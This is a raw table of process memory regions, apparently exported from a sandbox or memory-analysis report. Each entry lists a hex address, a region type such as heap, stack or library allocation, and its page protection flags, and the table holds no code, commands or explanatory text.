1F9E0E8A000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
2750000
|
trusted library allocation
|
page read and write
|
||
1BDC6127000
|
trusted library allocation
|
page read and write
|
||
1AA419CA000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
7FFB4B360000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4B24D000
|
trusted library allocation
|
page execute and read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B340000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
7FFB4B5A0000
|
trusted library allocation
|
page read and write
|
||
1B534000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
54BF000
|
heap
|
page read and write
|
||
537C000
|
heap
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
2243000
|
heap
|
page read and write
|
||
759000
|
heap
|
page read and write
|
||
1C020000
|
trusted library allocation
|
page read and write
|
||
240322A1000
|
trusted library allocation
|
page read and write
|
||
7DF4252B0000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
231A872C000
|
unkown
|
page read and write
|
||
22130B29000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1C040000
|
trusted library allocation
|
page read and write
|
||
1B480000
|
trusted library allocation
|
page read and write
|
||
1BFF0000
|
trusted library allocation
|
page read and write
|
||
1B460000
|
heap
|
page read and write
|
||
7FFB4B2BC000
|
trusted library allocation
|
page execute and read and write
|
||
240222A1000
|
trusted library allocation
|
page read and write
|
||
1B7F0000
|
heap
|
page read and write
|
||
1AA41978000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
7FFB4B380000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4B660000
|
trusted library allocation
|
page execute and read and write
|
||
DF7000
|
heap
|
page read and write
|
||
1C210000
|
trusted library allocation
|
page read and write
|
||
2212EE91000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B520000
|
trusted library allocation
|
page read and write
|
||
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
1F3F4C70000
|
heap
|
page execute and read and write
|
||
1B700000
|
trusted library allocation
|
page read and write
|
||
1F9E0617000
|
heap
|
page read and write
|
||
1F9E043B000
|
heap
|
page read and write
|
||
DE0000
|
heap
|
page read and write
|
||
1BDD4D48000
|
trusted library allocation
|
page read and write
|
||
1B6E8000
|
trusted library allocation
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
1BDC611A000
|
trusted library allocation
|
page read and write
|
||
96C416C000
|
stack
|
page read and write
|
||
231A872F000
|
unkown
|
page execute and read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
7FFB4B430000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1B6F3000
|
trusted library allocation
|
page read and write
|
||
3C0357F000
|
stack
|
page read and write
|
||
1B503000
|
heap
|
page read and write
|
||
7FFB4B550000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BE4B000
|
stack
|
page read and write
|
||
1F9E0416000
|
heap
|
page read and write
|
||
1F9DE0B1000
|
heap
|
page read and write
|
||
7FFB4B5F0000
|
trusted library allocation
|
page read and write
|
||
5446000
|
heap
|
page read and write
|
||
1F9DE0A8000
|
heap
|
page read and write
|
||
28C0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B2CC000
|
trusted library allocation
|
page execute and read and write
|
||
1C100000
|
trusted library allocation
|
page read and write
|
||
1F9E0CA0000
|
heap
|
page read and write
|
||
7FFB4B29D000
|
trusted library allocation
|
page execute and read and write
|
||
1C3B0000
|
trusted library allocation
|
page read and write
|
||
1B317000
|
trusted library allocation
|
page read and write
|
||
3C0377E000
|
stack
|
page read and write
|
||
2730000
|
trusted library allocation
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1F9E0D40000
|
heap
|
page read and write
|
||
7FFB4B366000
|
trusted library allocation
|
page execute and read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
3C031AE000
|
stack
|
page read and write
|
||
8AC2DFD000
|
stack
|
page read and write
|
||
2740000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
DEB000
|
heap
|
page read and write
|
||
8A9000
|
unkown
|
page readonly
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B3B0000
|
trusted library allocation
|
page read and write
|
||
1AA41970000
|
heap
|
page read and write
|
||
1C470000
|
trusted library allocation
|
page read and write
|
||
7FFB4B42A000
|
trusted library allocation
|
page read and write
|
||
1AA41FBF000
|
heap
|
page read and write
|
||
2216000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
DD5000
|
heap
|
page read and write
|
||
1AF85000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9DE087000
|
heap
|
page read and write
|
||
1BDC6123000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1BE40000
|
trusted library allocation
|
page read and write
|
||
1AA4198B000
|
heap
|
page read and write
|
||
1C490000
|
trusted library allocation
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
DC2000
|
heap
|
page read and write
|
||
1C440000
|
trusted library allocation
|
page read and write
|
||
24020690000
|
heap
|
page read and write
|
||
1AA401C8000
|
heap
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1B313000
|
trusted library allocation
|
page read and write
|
||
1C46E000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1C290000
|
trusted library allocation
|
page read and write
|
||
872B6FD000
|
stack
|
page read and write
|
||
1F3ECAAE000
|
trusted library allocation
|
page read and write
|
||
1AA3FFE6000
|
heap
|
page read and write
|
||
1C4F0000
|
trusted library allocation
|
page read and write
|
||
65FB000
|
stack
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
24023CAC000
|
trusted library allocation
|
page read and write
|
||
1F3ECAA7000
|
trusted library allocation
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1B330000
|
unkown
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1BFD0000
|
trusted library allocation
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E040C000
|
heap
|
page read and write
|
||
1B3B0000
|
trusted library allocation
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
240322D1000
|
trusted library allocation
|
page read and write
|
||
1F9E0423000
|
heap
|
page read and write
|
||
7FFB4B270000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
24022290000
|
heap
|
page read and write
|
||
7FFB4B520000
|
trusted library allocation
|
page read and write
|
||
1F3F4EF0000
|
heap
|
page read and write
|
||
7FFB4B4C0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
7FF63D2DB000
|
unkown
|
page read and write
|
||
1F9E0470000
|
unkown
|
page read and write
|
||
1BEF0000
|
trusted library allocation
|
page read and write
|
||
1BDAB000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F3DAE14000
|
heap
|
page read and write
|
||
1C400000
|
trusted library allocation
|
page read and write
|
||
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1AA3FDAF000
|
unkown
|
page execute and read and write
|
||
1BDC2D50000
|
heap
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1F3F4DB0000
|
heap
|
page read and write
|
||
1C380000
|
trusted library allocation
|
page read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
2890000
|
trusted library allocation
|
page read and write
|
||
BF083FE000
|
stack
|
page read and write
|
||
1F9E0D78000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
BF08A7B000
|
stack
|
page read and write
|
||
1B720000
|
trusted library allocation
|
page read and write
|
||
2400000
|
heap
|
page read and write
|
||
1F3DDAEA000
|
trusted library allocation
|
page read and write
|
||
7FFB4B573000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1C2C0000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B7F8000
|
heap
|
page read and write
|
||
1F9E01A9000
|
heap
|
page read and write
|
||
7FFB4B430000
|
trusted library allocation
|
page read and write
|
||
DE9000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1AA41E40000
|
heap
|
page read and write
|
||
DCD000
|
heap
|
page read and write
|
||
1F3DAE00000
|
heap
|
page execute and read and write
|
||
7FFB4B440000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1F9DE096000
|
heap
|
page read and write
|
||
5457000
|
heap
|
page read and write
|
||
2A4ACB51000
|
unkown
|
page execute read
|
||
1BDDD01B000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
1AA41F7E000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9DE0BE000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B3E2000
|
trusted library allocation
|
page read and write
|
||
54CB000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1AF85000
|
heap
|
page read and write
|
||
1C240000
|
trusted library allocation
|
page read and write
|
||
872C60C000
|
stack
|
page read and write
|
||
1C3D0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
D82000
|
heap
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1AA41F50000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BDC47E5000
|
heap
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
28C0000
|
trusted library allocation
|
page read and write
|
||
DC0000
|
trusted library section
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
3C03979000
|
stack
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B510000
|
trusted library allocation
|
page read and write
|
||
1F9E0D58000
|
heap
|
page read and write
|
||
26DE000
|
stack
|
page read and write
|
||
1ACFD000
|
stack
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
28C0000
|
trusted library allocation
|
page read and write
|
||
24D91290000
|
remote allocation
|
page execute and read and write
|
||
1F9E0D40000
|
heap
|
page read and write
|
||
2B80000
|
trusted library allocation
|
page read and write
|
||
2403AE3C000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
54DD000
|
heap
|
page read and write
|
||
1BF20000
|
trusted library allocation
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
544A000
|
heap
|
page read and write
|
||
7FFB4B260000
|
trusted library allocation
|
page read and write
|
||
1C000000
|
unkown
|
page read and write
|
||
54E8000
|
heap
|
page read and write
|
||
7FFB4B590000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0CC6000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F3F4BFB000
|
heap
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
2403A8A0000
|
heap
|
page execute and read and write
|
||
1F9DE0AE000
|
heap
|
page read and write
|
||
1BDC6251000
|
trusted library allocation
|
page read and write
|
||
1BDDCE25000
|
heap
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B4F0000
|
trusted library allocation
|
page read and write
|
||
1625000
|
heap
|
page read and write
|
||
1AF85000
|
heap
|
page read and write
|
||
8AC29FB000
|
stack
|
page read and write
|
||
1C3A0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
1AA419CB000
|
heap
|
page read and write
|
||
1B3B3000
|
trusted library allocation
|
page read and write
|
||
12908000
|
trusted library allocation
|
page read and write
|
||
884000
|
unkown
|
page read and write
|
||
127B000
|
stack
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1BDDCE79000
|
heap
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
BF07FDE000
|
stack
|
page read and write
|
||
1BDB0000
|
trusted library allocation
|
page read and write
|
||
1F3DAD00000
|
trusted library allocation
|
page read and write
|
||
7FFB4B580000
|
trusted library allocation
|
page read and write
|
||
1F9DE0BF000
|
heap
|
page read and write
|
||
38E2000
|
stack
|
page read and write
|
||
54D4000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1AF38000
|
heap
|
page read and write
|
||
7FFB4B424000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9DE0A8000
|
heap
|
page read and write
|
||
2214000
|
heap
|
page read and write
|
||
7FFB4B4C0000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
720000
|
heap
|
page readonly
|
||
2A4ACBD0000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
24D914F0000
|
heap
|
page read and write
|
||
7FFB4B284000
|
trusted library allocation
|
page read and write
|
||
BF0877A000
|
stack
|
page read and write
|
||
1AA3FF40000
|
unkown
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
7FFB4B430000
|
trusted library allocation
|
page read and write
|
||
1BDA0000
|
trusted library allocation
|
page read and write
|
||
DCF000
|
heap
|
page read and write
|
||
7FFB4B683000
|
trusted library allocation
|
page read and write
|
||
1AA3FED0000
|
heap
|
page read and write
|
||
28D0000
|
trusted library allocation
|
page read and write
|
||
DEB000
|
heap
|
page read and write
|
||
53BF000
|
heap
|
page read and write
|
||
1C350000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
2760000
|
trusted library allocation
|
page read and write
|
||
22130923000
|
heap
|
page read and write
|
||
899000
|
unkown
|
page write copy
|
||
3C03A7E000
|
stack
|
page read and write
|
||
1C500000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
540B000
|
heap
|
page read and write
|
||
1BE90000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0428000
|
heap
|
page read and write
|
||
1BDDCDDC000
|
heap
|
page read and write
|
||
291E000
|
trusted library allocation
|
page read and write
|
||
1B16D000
|
stack
|
page read and write
|
||
1C370000
|
trusted library allocation
|
page read and write
|
||
22130833000
|
heap
|
page read and write
|
||
1BD90000
|
trusted library allocation
|
page read and write
|
||
7FFB4B356000
|
trusted library allocation
|
page execute and read and write
|
||
1BE67000
|
trusted library allocation
|
page read and write
|
||
7FFB4B274000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E0423000
|
heap
|
page read and write
|
||
53F3000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F3DDA45000
|
trusted library allocation
|
page read and write
|
||
1AA3FFCB000
|
heap
|
page read and write
|
||
24022000000
|
trusted library allocation
|
page read and write
|
||
24020980000
|
heap
|
page read and write
|
||
7FFB4B4E0000
|
trusted library allocation
|
page read and write
|
||
1BF80000
|
trusted library allocation
|
page read and write
|
||
1BDD0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1AA3FFCB000
|
heap
|
page read and write
|
||
1C380000
|
trusted library allocation
|
page read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
1BE80000
|
trusted library allocation
|
page read and write
|
||
1C1F0000
|
unkown
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1AA3FF10000
|
unkown
|
page read and write
|
||
1B4E0000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B4E0000
|
trusted library allocation
|
page read and write
|
||
7FFBAA4A9000
|
unkown
|
page read and write
|
||
1B317000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
DC1000
|
heap
|
page read and write
|
||
1C270000
|
trusted library allocation
|
page read and write
|
||
1F3ECAAC000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
12B19000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1C4F0000
|
trusted library allocation
|
page read and write
|
||
2650000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
2403AB4E000
|
heap
|
page read and write
|
||
1F9E040C000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
5382000
|
heap
|
page read and write
|
||
1120000
|
heap
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1C140000
|
trusted library allocation
|
page read and write
|
||
1B390000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
12B11000
|
trusted library allocation
|
page read and write
|
||
1B5BD000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
3C036FE000
|
stack
|
page read and write
|
||
1F3DD99F000
|
trusted library allocation
|
page read and write
|
||
1BE57000
|
trusted library allocation
|
page read and write
|
||
1F9E034D000
|
heap
|
page read and write
|
||
1F9E03FC000
|
heap
|
page read and write
|
||
7FFB4B2DC000
|
trusted library allocation
|
page execute and read and write
|
||
2403AB42000
|
heap
|
page read and write
|
||
2403230C000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
7FF63D2DC000
|
unkown
|
page readonly
|
||
2901000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E0C91000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1B6F0000
|
trusted library allocation
|
page read and write
|
||
1B56C000
|
heap
|
page read and write
|
||
1BEA0000
|
trusted library allocation
|
page read and write
|
||
1F9DE0AE000
|
heap
|
page read and write
|
||
7DF4252C0000
|
trusted library allocation
|
page execute and read and write
|
||
54D7000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
240230D9000
|
trusted library allocation
|
page read and write
|
||
705000
|
heap
|
page read and write
|
||
541C000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
7FFB4B273000
|
trusted library allocation
|
page read and write
|
||
7DF46BA70000
|
trusted library allocation
|
page execute and read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7FFB4B25B000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1B307000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1C420000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BDDC000
|
trusted library allocation
|
page read and write
|
||
7FFB4B680000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1B730000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7DF43B4E1000
|
unkown
|
page execute read
|
||
1AA3FF20000
|
direct allocation
|
page execute and read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1F9E06CF000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1C0B4000
|
unkown
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
1B720000
|
trusted library allocation
|
page read and write
|
||
1AA3FFEC000
|
heap
|
page read and write
|
||
1B45B000
|
stack
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BE7A000
|
trusted library allocation
|
page read and write
|
||
1AA41A01000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B6A0000
|
trusted library allocation
|
page read and write
|
||
8AC29F4000
|
stack
|
page read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
7FFB4B6A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4B292000
|
trusted library allocation
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1C3C0000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
28C0000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
231A89E0000
|
heap
|
page readonly
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1C390000
|
trusted library allocation
|
page read and write
|
||
1AA41980000
|
heap
|
page read and write
|
||
1F3EC82E000
|
trusted library allocation
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
1C420000
|
trusted library allocation
|
page read and write
|
||
1B330000
|
trusted library allocation
|
page read and write
|
||
1F9E042D000
|
heap
|
page read and write
|
||
7FF7F085D000
|
direct allocation
|
page execute and read and write
|
||
1C280000
|
trusted library allocation
|
page read and write
|
||
1BE30000
|
trusted library allocation
|
page read and write
|
||
1F9E0D23000
|
heap
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1C340000
|
trusted library allocation
|
page read and write
|
||
7FFB4B320000
|
trusted library allocation
|
page execute and read and write
|
||
1F9DF940000
|
direct allocation
|
page read and write
|
||
1AA41A39000
|
heap
|
page read and write
|
||
1C130000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F3DAA60000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
1C0E0000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1C250000
|
trusted library allocation
|
page read and write
|
||
28C1000
|
direct allocation
|
page execute and read and write
|
||
1BE93000
|
trusted library allocation
|
page read and write
|
||
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E0CA0000
|
heap
|
page read and write
|
||
1B740000
|
trusted library allocation
|
page read and write
|
||
7FFB4B690000
|
trusted library allocation
|
page read and write
|
||
1C12A000
|
stack
|
page read and write
|
||
1B63C000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1090000
|
trusted library section
|
page read and write
|
||
2770000
|
trusted library allocation
|
page read and write
|
||
1F9E0423000
|
heap
|
page read and write
|
||
1AA41FBF000
|
heap
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
1F3DD523000
|
trusted library allocation
|
page read and write
|
||
1AF45000
|
heap
|
page read and write
|
||
7FFB4B500000
|
trusted library allocation
|
page read and write
|
||
7FFB4B590000
|
trusted library allocation
|
page read and write
|
||
2AFD000
|
stack
|
page read and write
|
||
24021FE0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
53B8000
|
heap
|
page read and write
|
||
1BDC2E0C000
|
heap
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
96C45FC000
|
stack
|
page read and write
|
||
1C0A3000
|
trusted library allocation
|
page read and write
|
||
1F9E0351000
|
heap
|
page read and write
|
||
7FFB4B400000
|
trusted library allocation
|
page execute and read and write
|
||
2403AB8E000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B470000
|
trusted library allocation
|
page read and write
|
||
1F9E0347000
|
heap
|
page read and write
|
||
1AA3FF20000
|
direct allocation
|
page execute and read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F3F4F20000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BDC3030000
|
heap
|
page read and write
|
||
1BE57000
|
trusted library allocation
|
page read and write
|
||
7DF43B4F4000
|
unkown
|
page read and write
|
||
1C480000
|
trusted library allocation
|
page read and write
|
||
7FFB4B410000
|
trusted library allocation
|
page read and write
|
||
1B6B0000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1C3E0000
|
trusted library allocation
|
page read and write
|
||
1BE20000
|
trusted library allocation
|
page read and write
|
||
1F3DD527000
|
trusted library allocation
|
page read and write
|
||
1B190000
|
trusted library allocation
|
page read and write
|
||
1B180000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
7FFB4B420000
|
trusted library allocation
|
page read and write
|
||
240220A0000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B2FC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4B4C0000
|
trusted library allocation
|
page read and write
|
||
22130921000
|
heap
|
page read and write
|
||
1BD40000
|
trusted library allocation
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
24D912B0000
|
heap
|
page read and write
|
||
2212ED40000
|
heap
|
page read and write
|
||
1C4B4000
|
trusted library allocation
|
page read and write
|
||
2B6A000
|
trusted library allocation
|
page read and write
|
||
7FF7F084D000
|
direct allocation
|
page execute and read and write
|
||
1BE86000
|
trusted library allocation
|
page read and write
|
||
1F3DAC46000
|
heap
|
page read and write
|
||
7FFBCB700000
|
direct allocation
|
page execute and read and write
|
||
1F9E06CF000
|
heap
|
page read and write
|
||
1BDC4710000
|
trusted library allocation
|
page read and write
|
||
1F9E0CA0000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
240322C1000
|
trusted library allocation
|
page read and write
|
||
7FFB4B599000
|
trusted library allocation
|
page read and write
|
||
1F3DC7B0000
|
heap
|
page read and write
|
||
89D000
|
unkown
|
page write copy
|
||
206F000
|
stack
|
page read and write
|
||
1BDF0000
|
trusted library allocation
|
page read and write
|
||
24020701000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
96C457C000
|
stack
|
page read and write
|
||
1B430000
|
heap
|
page read and write
|
||
1F9E0358000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1C3E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
240206FD000
|
heap
|
page read and write
|
||
1C480000
|
trusted library allocation
|
page read and write
|
||
1F9E05EB000
|
unkown
|
page read and write
|
||
1BDC2E80000
|
heap
|
page read and write
|
||
1BDC5C8C000
|
trusted library allocation
|
page read and write
|
||
1B3B0000
|
trusted library allocation
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
240221D0000
|
heap
|
page execute and read and write
|
||
3C0474B000
|
stack
|
page read and write
|
||
1C3F0000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
